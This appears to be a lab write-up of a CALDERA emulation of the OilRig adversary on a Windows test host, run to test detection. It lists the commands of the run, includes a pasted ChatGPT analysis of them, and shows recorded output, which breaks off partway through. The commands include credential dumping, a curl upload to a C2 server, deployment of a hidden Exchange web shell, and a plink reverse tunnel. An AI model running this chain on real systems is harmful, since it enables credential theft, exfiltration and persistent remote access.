"Unknown", "tactic": "discovery", "technique": "Query Registry", "attack_id": "T1012" }, { "ability_id": "7971246d-1392-411e-a803-a7946cf9e4d2", "platform": "windows", "commands": { "cmd": "net user #{initial.target.user} /domain\n" }, "privilege": "Unknown", "tactic": "discovery", "technique": "Account Discovery: Domain Account", "attack_id": "T1087.002" }, { "ability_id": "6a7b4ba0-a9bb-451d-ba9f-d3a2e8a82ffe", "platform": "windows", "commands": { "cmd": "net group \"SQL Admins\" /domain" }, "privilege": "Unknown", "tactic": "discovery", "technique": "Permission Groups Discovery: Domain Groups", "attack_id": "T1069.002" }, { "ability_id": "f9f1bd68-ec0a-47e7-8645-210844190d92", "platform": "windows", "commands": { "cmd": "nslookup #{second.target.host}\n" }, "privilege": "Unknown", "tactic": "discovery", "technique": "Remote System Discovery", "attack_id": "T1018" }, { "ability_id": "a23fb84f-dfb7-4d07-a6ec-0352ae983651", "platform": "windows", "commands": { "cmd": "C:\\Users\\#{initial.target.user}\\AppData\\local\\SystemFailureReporter\\b.exe\n" }, "privilege": "Unknown", "tactic": "credential-access", "technique": "Credentials from Password Stores: Windows Credential Manager", "attack_id": "T1555.004" }, { "ability_id": "021245dd-c0be-4900-bd6c-1c680f00a237", "platform": "windows", "commands": { "cmd": "curl -F \"data=@C:\\Users\\#{initial.target.user}\\AppData\\Roaming\\fsociety.dat\" --header \"X-Request-ID: #{initial.target.user}-#{paw}\" #{server}/file/upload\n" }, "privilege": "Unknown", "tactic": "exfiltration", "technique": "Exfiltration Over C2 Channel", "attack_id": "T1041" }, { "ability_id": "2f3be960-5c00-4f03-a9c2-da09c31d38d9", "platform": "windows", "commands": { "cmd": "copy C:\\Users\\#{initial.target.user}\\AppData\\Local\\SystemFailureReporter\\contact.aspx C:\\Users\\Public\\contact.aspx\n" }, "privilege": "Unknown", "tactic": "command-and-control", "technique": "Ingress Tool Transfer", "attack_id": "T1105" }, { "ability_id": "7aaecfb7-a1eb-477c-8d53-ab3009389623", "platform": "windows", "commands": { "cmd": "copy C:\\Users\\Public\\contact.aspx \"\\\\#{second.target.ip}\\C$\\Program Files\\Microsoft\\Exchange Server\\V15\\ClientAccess\\exchweb\\ews\\\"\n" }, "privilege": "Unknown", "tactic": "persistence", "technique": "Server Software Component: Web Shell", "attack_id": "T1505.003" }, { "ability_id": "5f7dc4b3-1287-4a25-b0b0-b6e73756cc11", "platform": "windows", "commands": { "cmd": "attrib +h \"\\\\#{second.target.ip}\\C$\\Program Files\\Microsoft\\Exchange Server\\V15\\ClientAccess\\exchweb\\ews\\contact.aspx\"" }, "privilege": "Unknown", "tactic": "defense-evasion", "technique": "Hide Artifacts: Hidden Files & Directories", "attack_id": "T1082" }, { "ability_id": "f3df5a83-2a5a-4277-8763-8fb51032d3fc", "platform": "windows", "commands": { "cmd": "copy C:\\Users\\#{initial.target.user}\\AppData\\Local\\SystemFailureReporter\\plink.exe C:\\Users\\Public\\Downloads\\plink.exe\n" }, "privilege": "Unknown", "tactic": "command-and-control", "technique": "Ingress Tool Transfer", "attack_id": "T1105" }, { "ability_id": "212995b5-acfc-404b-b3a9-a19cc0afa9a5", "platform": "windows", "commands": { "proc": "exec-background C:\\Users\\Public\\Downloads\\plink.exe -no-antispoof -ssh -N -R #{caldera.server.ip}:13389:#{second.target.ip}:3389 -l #{caldera.user.name} -pw \"#{caldera.user.password}\" #{caldera.server.ip}\n" }, "privilege": "Unknown", "tactic": "command-and-control", "technique": "Protocol Tunneling", "attack_id": "T1572" }, { "ability_id": "d9c9a941-c0e8-4eed-8cc3-6511ad5b9e15", "platform": "windows", "commands": { "cmd": "del C:\\Users\\gosta\\AppData\\Roaming\\fsociety.dat C:\\Users\\Public\\Downloads\\plink.exe;\n" }, "privilege": "Unknown", "tactic": "defense-evasion", "technique": "Indicator Removal on Host: File Deletion", "attack_id": "T1070.004" }, { "ability_id": "16767c68-a865-46af-a0e4-ff8d742efc3f", "platform": "windows", "commands": { "cmd": "curl -s -H \"KEY:#{server.api.key}\" -H \"Content-Type: application/json\" -X PATCH http://#{caldera.server.ip}:8888/api/v2/agents/#{paw} -d \"{\\\"watchdog\\\":1}\"\n" }, "privilege": "Unknown", "tactic": "defense-evasion", "technique": "Indicator Removal on Host: File Deletion", "attack_id": "T1070.004" } ] }
Windows Commands extracted
- For adversary
OilRig, extracting the commands executed in every ability:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
cat oilrig_windows_commands.txt
cscript /nologo computername.vbs
cscript /nologo username.vbs
whoami
hostname
ipconfig /all
net user /domain
net group /domain
net group "domain admins" /domain
net group "Exchange Trusted Subsystem" /domain
net accounts /domain
net user
net localgroup administrators
netstat -na
tasklist
sc query
systeminfo
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"
net user #{initial.target.user} /domain
net group "SQL Admins" /domain
nslookup #{second.target.host}
C:\Users\#{initial.target.user}\AppData\local\SystemFailureReporter\b.exe
curl -F "data=@C:\Users\#{initial.target.user}\AppData\Roaming\fsociety.dat" --header "X-Request-ID: #{initial.target.user}-#{paw}" #{server}/file/upload
copy C:\Users\#{initial.target.user}\AppData\Local\SystemFailureReporter\contact.aspx C:\Users\Public\contact.aspx
copy C:\Users\Public\contact.aspx "\\#{second.target.ip}\C$\Program Files\Microsoft\Exchange Server\V15\ClientAccess\exchweb\ews\"
attrib +h "\\#{second.target.ip}\C$\Program Files\Microsoft\Exchange Server\V15\ClientAccess\exchweb\ews\contact.aspx"
copy C:\Users\#{initial.target.user}\AppData\Local\SystemFailureReporter\plink.exe C:\Users\Public\Downloads\plink.exe
exec-background C:\Users\Public\Downloads\plink.exe -no-antispoof -ssh -N -R #{caldera.server.ip}:13389:#{second.target.ip}:3389 -l #{caldera.user.name} -pw "#{caldera.user.password}" #{caldera.server.ip}
del C:\Users\gosta\AppData\Roaming\fsociety.dat C:\Users\Public\Downloads\plink.exe;
curl -s -H "KEY:#{server.api.key}" -H "Content-Type: application/json" -X PATCH http://#{caldera.server.ip}:8888/api/v2/agents/#{paw} -d "{\"watchdog\":1}"
What does ChatGPT think about this sequence of commands:
The current questioning is at Chatgpt instance
Prompt:
The following is a sequence of commands corresponding the sequence of ability execution for the adversary oilrig in caldera plugin emu. I need you to analyze this sequence, and to contrast it with your knowledge, and explain to me what the adversary tries to achive.Answer:
`This sequence of commands for the OilRig adversary in the CALDERA Emu plugin outlines a structured, multi-stage attack, mimicking the behavior of advanced persistent threats (APTs). The commands follow a methodical progression through the stages of a typical kill chain, focusing on information gathering, credential access, persistence, exfiltration, defense evasion, and command-and-control (C2). Here’s an analysis of each step and the adversary’s objectives.
Analysis of Attack Phases and Objectives
1. Discovery Phase (Commands for Reconnaissance on the Host and Network)
The attacker begins by collecting critical information about the environment to understand the target’s layout, users, and network configuration. This reconnaissance phase is essential for planning subsequent steps.
System and User Information:
cscript /nologo computername.vbs,hostname,systeminfo: Collect the computer’s name, hostname, and system information (T1082).cscript /nologo username.vbs,whoami,net user: Identify current and available users on the system and within the local network (T1033,T1087.001).
Network Information:
ipconfig /all: Retrieves network configuration, showing IP addresses, DNS, and network adapter details (T1016).nslookup #{second.target.host}: Resolves domain names to IPs, useful for identifying internal and external hosts (T1018).netstat -na: Lists active network connections, giving insight into accessible services and open ports (T1049).
Account and Privilege Information:
net user /domain,net group /domain,net group "domain admins" /domain,net group "Exchange Trusted Subsystem" /domain: Enumerate domain users and groups, especially privileged ones (T1069.002,T1087.002).net accounts /domain: Retrieves domain password policy details (T1201).net localgroup administrators: Checks for local administrative privileges (T1069.001).
Running Processes and Services:
tasklist: Lists active processes, useful for identifying running security services or monitoring tools (T1057).sc query: Lists system services, giving insight into important services like antivirus, which might need to be avoided or disabled (T1007).
Registry and Configuration Information:
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default": Checks for recent RDP connections, helping assess previous remote access activity and potential lateral movement targets (T1012).
- Credential Access Phase (Attempt to Steal Credentials)
After gathering basic information, the attacker attempts to access credentials that can be used to escalate privileges or move laterally within the network.
- Credential Dumping:
C:\Users\#{initial.target.user}\AppData\local\SystemFailureReporter\b.exe: Likely a tool or script designed toextract credentialsstored in the system’s Credential Manager or other secure locations (T1555.004).
- Exfiltration Phase (Extracting Information)
This phase involves moving collected data out of the target network to an external server under the attacker’s control.
- File Upload:
curl -F "data=@C:\Users\#{initial.target.user}\AppData\Roaming\fsociety.dat" --header "X-Request-ID: #{initial.target.user}-#{paw}" #{server}/file/upload: Uploads a specified file, potentially containing credentials or sensitive information, to the attacker’s external server (T1041).
- Persistence Phase (Maintaining Access)
The attacker deploys a web shell on a server directory that allows for remote code execution, ensuring ongoing access to the compromised environment.
- Web Shell Deployment:
copy C:\Users\Public\contact.aspx "\\#{second.target.ip}\C$\Program Files\Microsoft\Exchange Server\V15\ClientAccess\exchweb\ews\": Copies a web shell file to an Exchange server directory, allowing the attacker to execute commands remotely by sending HTTP requests to this file (T1505.003).attrib +h "\\#{second.target.ip}\C$\Program Files\Microsoft\Exchange Server\V15\ClientAccess\exchweb\ews\contact.aspx": Sets the hidden attribute on the web shell file, making it less noticeable on the filesystem (T1564.001).
- Command-and-Control (C2) Phase (Setting up C2 for Remote Access)
The attacker configures a persistent C2 channel using plink.exe for SSH tunneling, enabling remote control over the target environment. This C2 setup allows the attacker to maintain a foothold and issue commands without being physically present.
- Setup SSH Reverse Tunnel:
copy C:\Users\#{initial.target.user}\AppData\Local\SystemFailureReporter\plink.exe C:\Users\Public\Downloads\plink.exe: Prepares an SSH utility (plink.exe) for tunneling connections.exec-background C:\Users\Public\Downloads\plink.exe -no-antispoof -ssh -N -R #{caldera.server.ip}:13389:#{second.target.ip}:3389 -l #{caldera.user.name} -pw "#{caldera.user.password}" #{caldera.server.ip}: Establishes an SSH reverse tunnel from the target system to the attacker’s C2 server, allowing remote access to the target’s RDP service (T1572).
- Defense Evasion Phase (Covering Tracks and Modifying Agent)
The attacker finalizes the intrusion by removing artifacts and modifying the agent’s settings to evade detection and reduce forensic evidence.
Remove Evidence:
del C:\Users\gosta\AppData\Roaming\fsociety.dat C:\Users\Public\Downloads\plink.exe;: Deletes evidence of exfiltration files and SSH utilities, ensuring minimal trace of the activity (T1070.004).
Modify Agent for Evasion:
curl -s -H "KEY:#{server.api.key}" -H "Content-Type: application/json" -X PATCH http://#{caldera.server.ip}:8888/api/v2/agents/#{paw} -d "{\"watchdog\":1}": Sends a request to modify the agent’s settings, possibly extending its lifecycle or reducing logging to evade detection (T1564).
Summary: Adversary’s Objective
The OilRig adversary employs this command sequence to execute a comprehensive attack strategy aimed at infiltration, persistence, and exfiltration while evading detection. The main objectives include:
Detailed Reconnaissance: Systematically map the system’s resources, users, network, and policies to establish a solid foundation for attack operations.
Credential Harvesting: Attempt to obtain credentials for privilege escalation or lateral movement.
Data Exfiltration: Steal specific files from the host and upload them to a remote server, likely containing sensitive data or access credentials.
Persistence Setup: Deploy a hidden web shell and SSH tunnel to maintain access for future actions without requiring re-entry.
C2 Channel Establishment: Set up a persistent command-and-control mechanism for issuing commands remotely.
Evasion and Covering Tracks: Clean up artifacts, hide files, and modify settings to reduce the chance of detection and leave as little evidence as possible.
This strategy reflects a persistent and stealth-focused APT-style attack, closely aligned with real-world tactics used by threat actors aiming to maintain access over extended periods and conduct reconnaissance, data exfiltration, and system compromise while minimizing the likelihood of discovery.`
Checking the Caldera Event Logs:
Checking the Caldera Report:
Commands && Outputs
- Running the following script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
import json
# Load JSON data from the input file
input_file = "Test-OilRig_event-logs.json"
output_file = "Test-OilRig_commands_output.txt"
with open(input_file, 'r') as file:
data = json.load(file)
# Extract command and output fields for each JSON object
results = []
for obj in data:
command = obj.get("command", "N/A")
output = obj.get("output", {})
stdout = output.get("stdout", "N/A")
stderr = output.get("stderr", "N/A")
exit_code = output.get("exit_code", "N/A")
result = f"command: {command}\nstdout: {stdout}\nstderr: {stderr}\nexit code: {exit_code}\n"
results.append(result)
# Write the results to the output file
with open(output_file, 'w') as file:
for result in results:
file.write(result + "\n")
print(f"Extracted information saved to {output_file}")
- We obtain the commands, output (
stdout), error (stderr), andexit code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
command: cscript /nologo computername.vbs
stdout: windows-server
stderr:
exit code: 0
command: cscript /nologo username.vbs
stdout: administrator
stderr:
exit code: 0
command: whoami
stdout: windows-server\administrator
stderr:
exit code: 0
command: hostname
stdout: windows-server
stderr:
exit code: 0
command: ipconfig /all
stdout: Windows IP Configuration Host Name . . . . . . . . . . . . : windows-server Primary Dns Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : NoEthernet adapter Ethernet: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection Physical Address. . . . . . . . . : 08-00-27-83-24-CB DHCP Enabled. . . . . . . . . . . : No Autoconfiguration Enabled . . . . : Yes Link-local IPv6 Address . . . . . : fe80::5588:53e8:2e27:9e65%7(Preferred) IPv4 Address. . . . . . . . . . . : 192.168.1.21(Preferred) Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.1.1 DHCPv6 IAID . . . . . . . . . . . : 352845863 DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-2E-9F-1E-ED-08-00-27-83-24-CB DNS Servers . . . . . . . . . . . : 8.8.8.8 4.4.4.4 NetBIOS over Tcpip. . . . . . . . : Enabled
stderr:
exit code: 0
command: net user /domain
stdout: The request will be processed at a domain controller for domain WORKGROUP.
stderr: System error 1355 has occurred.The specified domain either does not exist or could not be contacted.
exit code: 2
command: net group /domain
stdout: The request will be processed at a domain controller for domain WORKGROUP.
stderr: System error 1355 has occurred.The specified domain either does not exist or could not be contacted.
exit code: 2
command: net group "domain admins" /domain
stdout: The request will be processed at a domain controller for domain WORKGROUP.
stderr: System error 1355 has occurred.The specified domain either does not exist or could not be contacted.
exit code: 2
command: net group "Exchange Trusted Subsystem" /domain
stdout: The request will be processed at a domain controller for domain WORKGROUP.
stderr: System error 1355 has occurred.The specified domain either does not exist or could not be contacted.
exit code: 2
command: net accounts /domain
stdout: The request will be processed at a domain controller for domain WORKGROUP.
stderr: System error 1355 has occurred.The specified domain either does not exist or could not be contacted.
exit code: 2
command: net user
stdout: User accounts for \\WINDOWS-SERVER-------------------------------------------------------------------------------Administrator DefaultAccount Guest WDAGUtilityAccount The command completed successfully.
stderr:
exit code: 0
command: net localgroup administrators
stdout: Alias name administratorsComment Administrators have complete and unrestricted access to the computer/domainMembers-------------------------------------------------------------------------------AdministratorThe command completed successfully.
stderr:
exit code: 0
command: netstat -na
stdout: Active Connections Proto Local Address Foreign Address State TCP 0.0.0.0:22 0.0.0.0:0 LISTENING TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING TCP 0.0.0.0:49678 0.0.0.0:0 LISTENING TCP 127.0.0.1:6789 0.0.0.0:0 LISTENING TCP 127.0.0.1:6789 127.0.0.1:49718 ESTABLISHED TCP 127.0.0.1:6789 127.0.0.1:49720 ESTABLISHED TCP 127.0.0.1:6789 127.0.0.1:49722 ESTABLISHED TCP 127.0.0.1:6789 127.0.0.1:49724 ESTABLISHED TCP 127.0.0.1:6789 127.0.0.1:49729 ESTABLISHED TCP 127.0.0.1:49718 127.0.0.1:6789 ESTABLISHED TCP 127.0.0.1:49720 127.0.0.1:6789 ESTABLISHED TCP 127.0.0.1:49722 127.0.0.1:6789 ESTABLISHED TCP 127.0.0.1:49724 127.0.0.1:6789 ESTABLISHED TCP 127.0.0.1:49729 127.0.0.1:6789 ESTABLISHED TCP 192.168.1.21:22 192.168.2.101:51596 ESTABLISHED TCP 192.168.1.21:139 0.0.0.0:0 LISTENING TCP 192.168.1.21:49679 192.168.1.201:8220 ESTABLISHED TCP 192.168.1.21:50575 192.168.2.13:8888 ESTABLISHED TCP 192.168.1.21:56372 142.251.170.94:443 CLOSE_WAIT TCP 192.168.1.21:56582 192.168.2.13:8888 ESTABLISHED TCP 192.168.1.21:57134 192.168.2.200:9200 ESTABLISHED TCP 192.168.1.21:57365 192.168.2.13:8888 ESTABLISHED TCP 192.168.1.21:57369 192.168.2.13:8888 ESTABLISHED TCP 192.168.1.21:57395 192.168.2.13:8888 ESTABLISHED TCP 192.168.1.21:57406 192.168.2.13:8888 TIME_WAIT TCP 192.168.1.21:57416 192.168.2.13:8888 TIME_WAIT TCP 192.168.1.21:57419 192.168.2.13:8888 ESTABLISHED TCP 192.168.1.21:57423 192.168.2.13:8888 ESTABLISHED TCP 192.168.1.21:57428 192.168.2.200:9200 ESTABLISHED TCP 192.168.1.21:57429 192.168.2.200:9200 ESTABLISHED TCP [::]:22 [::]:0 LISTENING TCP [::]:135 [::]:0 LISTENING TCP [::]:445 [::]:0 LISTENING TCP [::]:5357 [::]:0 LISTENING TCP [::]:5985 [::]:0 LISTENING TCP [::]:47001 [::]:0 LISTENING TCP [::]:49664 [::]:0 LISTENING TCP [::]:49665 [::]:0 LISTENING TCP [::]:49666 [::]:0 LISTENING TCP [::]:49667 [::]:0 LISTENING TCP [::]:49668 [::]:0 LISTENING TCP [::]:49669 [::]:0 LISTENING TCP [::]:49678 [::]:0 LISTENING UDP 0.0.0.0:123 *:* UDP 0.0.0.0:500 *:* UDP 0.0.0.0:3702 *:* UDP 0.0.0.0:3702 *:* UDP 0.0.0.0:4500 *:* UDP 0.0.0.0:5353 *:* UDP 0.0.0.0:5353 *:* UDP 0.0.0.0:5353 *:* UDP 0.0.0.0:5355 *:* UDP 0.0.0.0:55695 *:* UDP 0.0.0.0:63114 *:* UDP 127.0.0.1:55694 127.0.0.1:55694 UDP 192.168.1.21:137 *:* UDP 192.168.1.21:138 *:* UDP [::]:123 *:* UDP [::]:500 *:* UDP [::]:3702 *:* UDP [::]:3702 *:* UDP [::]:4500 *:* UDP [::]:5353 *:* UDP [::]:5353 *:* UDP [::]:5355 *:* UDP [::]:55696 *:* UDP [::]:63114 *:*
stderr:
exit code: 0
command: tasklist
stdout: Image Name PID Session Name Session# Mem Usage========================= ======== ================ =========== ============System Idle Process 0 Services 0 8 KSystem 4 Services 0 156 KRegistry 124 Services 0 69,096 Ksmss.exe 376 Services 0 1,284 Kcsrss.exe 480 Services 0 6,340 Kcsrss.exe 552 Console 1 6,712 Kwininit.exe 576 Services 0 6,952 Kwinlogon.exe 620 Console 1 11,640 Kservices.exe 696 Services 0 9,340 Klsass.exe 716 Services 0 17,648 Ksvchost.exe 836 Services 0 23,416 Kfontdrvhost.exe 864 Services 0 3,448 Kfontdrvhost.exe 872 Console 1 4,840 Ksvchost.exe 956 Services 0 11,848 Ksvchost.exe 996 Services 0 8,356 Kdwm.exe 436 Console 1 117,536 Ksvchost.exe 780 Services 0 10,080 Ksvchost.exe 1144 Services 0 5,368 Ksvchost.exe 1152 Services 0 12,300 Ksvchost.exe 1204 Services 0 23,484 Ksvchost.exe 1280 Services 0 7,156 Ksvchost.exe 1308 Services 0 7,780 Ksvchost.exe 1316 Services 0 7,476 KVBoxService.exe 1364 Services 0 7,156 Ksvchost.exe 1416 Services 0 11,020 Ksvchost.exe 1448 Services 0 12,864 Ksvchost.exe 1456 Services 0 5,848 Ksvchost.exe 1464 Services 0 7,840 Ksvchost.exe 1472 Services 0 15,608 Ksvchost.exe 1600 Services 0 8,536 Ksvchost.exe 1656 Services 0 10,696 Ksvchost.exe 1708 Services 0 6,084 Ksvchost.exe 1724 Services 0 8,932 Ksvchost.exe 1732 Services 0 8,780 Ksvchost.exe 1788 Services 0 12,668 Ksvchost.exe 1812 Services 0 7,536 Ksvchost.exe 1836 Services 0 16,536 Ksvchost.exe 1976 Services 0 7,756 Ksvchost.exe 2008 Services 0 9,092 Ksvchost.exe 2244 Services 0 6,968 Ksvchost.exe 2348 Services 0 7,172 Ksvchost.exe 2356 Services 0 8,204 Kspoolsv.exe 2416 Services 0 17,292 Ksvchost.exe 2488 Services 0 14,304 Ksvchost.exe 2496 Services 0 31,340 Ksvchost.exe 2512 Services 0 10,832 Ksvchost.exe 2520 Services 0 7,048 Ksvchost.exe 2552 Services 0 6,796 Ksvchost.exe 2572 Services 0 5,668 Ksvchost.exe 2608 Services 0 19,184 Ksvchost.exe 2620 Services 0 7,696 Ksvchost.exe 2672 Services 0 11,848 KSysmon64.exe 2756 Services 0 17,768 Ksvchost.exe 2764 Services 0 11,692 Kwlms.exe 2828 Services 0 3,608 KMsMpEng.exe 2868 Services 0 56,636 Kelastic-endpoint.exe 2888 Services 0 73,992 Ksvchost.exe 2792 Services 0 8,560 Ksvchost.exe 3128 Services 0 7,120 Ksvchost.exe 3248 Services 0 12,884 Ksvchost.exe 3444 Services 0 9,620 Kelastic-agent.exe 3664 Services 0 43,796 KAggregatorHost.exe 2896 Services 0 4,708 Kagentbeat.exe 4768 Services 0 189,584 Kagentbeat.exe 4776 Services 0 140,600 Kagentbeat.exe 4788 Services 0 131,264 Kagentbeat.exe 4800 Services 0 156,480 Kconhost.exe 4216 Services 0 12,800 Kconhost.exe 4232 Services 0 12,808 Kconhost.exe 4652 Services 0 12,808 Kconhost.exe 3756 Services 0 12,800 Kunsecapp.exe 4860 Services 0 6,788 Kauditbeat.exe 4892 Services 0 53,820 Ksvchost.exe 3144 Services 0 13,688 Ksvchost.exe 1168 Services 0 18,280 Kmsdtc.exe 1664 Services 0 10,872 Ksvchost.exe 4904 Services 0 12,640 Ksvchost.exe 2432 Services 0 14,700 Ksvchost.exe 2600 Services 0 14,288 Ksvchost.exe 4508 Services 0 12,116 Ksihost.exe 2544 Console 1 29,964 Ksvchost.exe 1848 Console 1 15,876 Ksvchost.exe 680 Console 1 29,716 Ktaskhostw.exe 1400 Console 1 12,828 Ksvchost.exe 3340 Services 0 15,204 Ksvchost.exe 4712 Services 0 7,700 Kctfmon.exe 3896 Console 1 20,932 Ksvchost.exe 3028 Services 0 12,652 Ksvchost.exe 5248 Services 0 11,072 Kexplorer.exe 5636 Console 1 154,832 KStartMenuExperienceHost.e 6032 Console 1 66,052 KTextInputHost.exe 6040 Console 1 52,372 KServerManager.exe 6076 Console 1 114,940 KRuntimeBroker.exe 2124 Console 1 21,520 KSearchApp.exe 5244 Console 1 184,396 KRuntimeBroker.exe 6152 Console 1 36,016 KRuntimeBroker.exe 6352 Console 1 22,108 KVBoxTray.exe 6748 Console 1 15,416 Ksvchost.exe 6916 Console 1 17,632 Kdllhost.exe 5620 Console 1 12,504 Ksshd.exe 560 Services 0 7,728 Ksshd.exe 6852 Services 0 8,356 Ksshd.exe 1124 Services 0 8,376 Kconhost.exe 5328 Services 0 5,268 Kcmd.exe 3492 Services 0 4,756 Kpowershell.exe 6576 Services 0 82,768 Kchrome.exe 6976 Console 1 156,840 Kchrome.exe 4324 Console 1 8,296 Kchrome.exe 7148 Console 1 45,188 Kchrome.exe 3288 Console 1 19,616 Kchrome.exe 5608 Console 1 233,064 Kchrome.exe 1020 Console 1 123,068 Kchrome.exe 2020 Console 1 71,608 Kpowershell.exe 6292 Console 1 105,012 Kconhost.exe 6928 Console 1 23,568 Kchrome.exe 6872 Console 1 61,192 Kchrome.exe 5856 Console 1 31,288 Kcaldera-read-team-agent.e 5568 Console 1 15,400 Kconhost.exe 3180 Console 1 13,864 KShellExperienceHost.exe 136 Console 1 58,456 KRuntimeBroker.exe 3112 Console 1 22,144 Ksvchost.exe 2088 Services 0 8,972 Ksvchost.exe 3024 Services 0 20,464 Ksvchost.exe 1216 Services 0 7,596 KWmiPrvSE.exe 7404 Services 0 23,116 KWmiPrvSE.exe 7924 Services 0 10,416 KWmiPrvSE.exe 1856 Services 0 13,636 Kcmd.exe 7780 Console 1 4,908 Ktasklist.exe 3472 Console 1 9,864 K
stderr:
exit code: 0
command: sc query
stdout: SERVICE_NAME: auditbeatDISPLAY_NAME: auditbeat TYPE : 10 WIN32_OWN_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: BFEDISPLAY_NAME: Base Filtering Engine TYPE : 20 WIN32_SHARE_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: BrokerInfrastructureDISPLAY_NAME: Background Tasks Infrastructure Service TYPE : 20 WIN32_SHARE_PROCESS STATE : 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: camsvcDISPLAY_NAME: Capability Access Manager Service TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: CDPSvcDISPLAY_NAME: Connected Devices Platform Service TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: CoreMessagingRegistrarDISPLAY_NAME: CoreMessaging TYPE : 20 WIN32_SHARE_PROCESS STATE : 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: CryptSvcDISPLAY_NAME: Cryptographic Services TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: DcomLaunchDISPLAY_NAME: DCOM Server Process Launcher TYPE : 20 WIN32_SHARE_PROCESS STATE : 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: DhcpDISPLAY_NAME: DHCP Client TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: DiagTrackDISPLAY_NAME: Connected User Experiences and Telemetry TYPE : 10 WIN32_OWN_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: DispBrokerDesktopSvcDISPLAY_NAME: Display Policy Service TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: DnscacheDISPLAY_NAME: DNS Client TYPE : 30 WIN32 STATE : 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: DPSDISPLAY_NAME: Diagnostic Policy Service TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: Elastic AgentDISPLAY_NAME: Elastic Agent TYPE : 10 WIN32_OWN_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 